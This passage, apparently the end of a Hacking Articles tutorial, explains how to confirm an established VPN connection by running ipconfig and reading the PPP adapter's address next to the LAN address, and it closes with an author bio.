
To confirm that the VPN connection is established, open a command prompt and type ipconfig; it shows a second IP address alongside the LAN one.

My IP is 192.168.0.104 under the PPP adapter for the VPN connection, which is used to log in to the server and access the network and share data, while my LAN IP is still 192.168.0.105. This shows the VPN connection is established successfully.

Author: Aarti Singh is a researcher and technical writer at Hacking Articles, an information security consultant, social media lover and gadget enthusiast.